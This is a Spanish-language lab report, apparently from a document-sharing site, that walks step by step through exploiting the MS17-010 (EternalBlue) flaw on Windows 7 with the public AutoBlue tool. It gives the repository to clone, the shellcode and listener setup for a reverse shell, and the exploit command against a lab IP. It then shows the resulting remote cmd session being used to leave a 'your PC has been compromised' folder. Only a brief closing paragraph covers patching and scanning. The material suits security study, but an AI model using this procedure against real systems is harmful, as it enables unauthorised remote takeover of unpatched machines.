MS17-010 EternalBlue

Descargar como docx, pdf o txt
Descargar como docx, pdf o txt
Está en la página 1de 9

INFORME DE USO DE EXPLOIT AUTOBLUE POR LA VULNERABILIDAD DE

W7 MS17-010

PASO 1.-

Para iniciar el ataque de la vulnerabilidad MS17-010 de Windows7 Ultimate SP1 de 32-64 bits se
debe copiar o clonar el siguiente repositorio: https://github.com/3ndG4me/AutoBlue-MS17-010.git

PASO 2.-

Luego se debe ir a la carpeta shellcode dentro de la carpeta Autoblue-MS17-010 y generar el


compilador eternalblue ejecutando el comando “./shell_prep.sh”
PASO 3.-
Una vez en el compilador de Eternal Blue Windows Shellcode Compiler se debe seguir las
siguientes indicaciones:

1.-le gustaría auto generar un reverse Shell con msfvenom sí o no “(Y/n)”

Ponemos Y (si) para generar el PAYLOAD

2.- LHOST = la dirección IP del atacante en este caso, el del Kali que se está usando.

3.- LPORT puerto por donde va a escuchar abierto de 64bits (x64)

En este caso el puerto donde se hará el ataque es a un Windows de 64 bits que tiene el puerto 445
abierto, se procede a poner ese mismo puerto mencionado.

4.- LPORT puerto por donde se va a escuchar abierto de 32 bits (x32)

En este caso se puso el puerto 446, debido que el 445 se hará en el W7 de x64 y no se deben
repetir los puertos que se harán los ataques, sino, se generar un error en el procedimiento del
Shellcode al comento de compilar.

5.- Escribe 0 para generar una Shell meterpreter o 1 para generar una Shell regular de cmd

Para este ejemplo se va usar el cmd ósea que se dio a la opción 1

6.- Escribe 0 para generar cargas útiles por etapas (staged payload) o 1 para generar cargas útiles
sin etapa (stageless payload)

Para este ejemplo se va usar el 1 para (staged payload)

Luego el compilador hace el binario necesario para hacer los parámetros del metasploit para
32(x86) bits y 64(x64) bits
.

PASO 4.-
Una vez obtenido el archivo binario nos movemos a la carpeta principal AutoBlue-MS17-010 con el
comando “cd ..”, se copia el archivo de la carpeta shellcode el archivo especifico “sc_all.bin” a la
carpeta AutoBlue-MS17-010 con el comando “mv shellcode/sc_all.bin ../AutoBlue-MS17-010” luego
vemos que se copió con éxito el archivo en la carpeta principal de AutoBlue-MS17-010 con el
comando “ls”
PASO 5.-
De allí se debe configurar la escucha para capturar la sesión de shellcode en donde se compilará
las instrucciones y se activa el PostgreSQL

Luego abrimos el Enternal Blue Metasploit Listener con el comando “./listener_prep.sh” y se debe
seguir las siguiendo indicaciones:

1.- LHOST = la dirección IP del atacante en este caso, el del Kali que se está usando.

2.- LPORT puerto por donde va a escuchar abierto de 64bits (x64)

En este caso el puerto donde se hará el ataque es a un Windows de 64 bits que tiene el puerto 445
abierto, se procede a poner ese mismo puerto mencionado.

3.- LPORT puerto por donde se va a escuchar abierto de 32 bits (x32)

En este caso se puso el puerto 446, debido que el 445 se hará en el W7 de x64 y no se deben
repetir los puertos que se harán los ataques, sino, se generar un error en el procedimiento del
Shellcode al comento de compilar.

4.- Escribe 0 para generar una Shell meterpreter o 1 para generar una Shell regular de cmd

Para este ejemplo se va usar el cmd ósea que se dio a la opción 1

5.- Escribe 0 para generar cargas útiles por etapas (staged payload) o 1 para generar cargas útiles
sin etapa (stageless payload)

Para este ejemplo se va usar el 1 para (staged payload)

Luego el listerner iniciara el servicio PostgreSQL e iniciara también el MetaSploit Framework


console

Este paso es parecido al “PASO 3” pero con excepción de que ya no configuras PAYLOAD en
msfvenom solo lo la ip_victima, los puertos por lo que estará escuchando y cmd o mertepreter que
se va usar, stageless o staged payload.
Una vez activado el PostgreSQL se inicia el metaspoit framework console y se autoconfigura el
PAYLOAD con un Shell_reverse_tcp que hemos escrito antes en los archivos binarios haciendo
ataques a sistema de 64 y 32 bits a la vez mediante el puerto 445 y 446, en este caso, a
Windows7.

PASO 6.-
Una vez estando en manejador(handler) ejecutado por el listerner,se abre un nueva venta shell
para ir a la carpeta de autoblue-ms17-010 y se inicia el ataque poniendo el comando de “phyton3
eternalblue_exploit7.py 192.168.0.x sc_all.bin” el cual hace un target identificando que es un
Windows 7 Service Pack 1y que ha sido ejecutado el exploit.
Ahora vemos como en la otra ventana de Shell, el listener capturo la sesión de Shell cmd de la
ip_victima en este caso al 192.168.0.12 y con el comando “sessions 1” se ingresa al cmd remoto
del Windows 7

VERIFICACION DEL EXPLOIT EN LA SHELL REOMATA CMD DE LA IP_VICTIMA. -


Como se puede apreciar en la figura de a continuación se puede observar que estamos en la Shell
cmd de la ip_victima y puede verse los directorios de las rutas en las que se encuentra
Vemos que el nombre de la maquina ip_victima se llama nintendo64 y tratamos de ver como
dejarle un mensaje.
Se crea una carpeta mediante la Shell remota que está en 2do plano creando una carpeta que
dice: su_pc_ha_siendo_comprometida_por_un_atacante.
Conclusión. –
El exploit de la vulnerabilidad MS17-010 mediante eternalblue es todo un éxito para sistemas de 64
y 32 bits, el cual puede ser un riesgo medio a critico debido a que pueden acceder de forma remota
en 2do plano la Shell en este caso cmd del Windows7 que es la ip_victima y que pueden hacerle
DoS, manipular datos y demás ya estando comprometido sus datos de la ip victimaria.

Recomendación. –
Existen algunas actualizaciones para parchear o arreglar este tipo de vulnerabilidades en Windows
7 que se pueden obtener de internet y configurando bien los puertos de los sistemas operativos
que tengan ese tipo de vulnerabilidad a través de un escaneo de Nessus que sirve como
herramienta de detección de vulnerabilidades y Nmap con sus scripts de vulnerabilidades.

También podría gustarte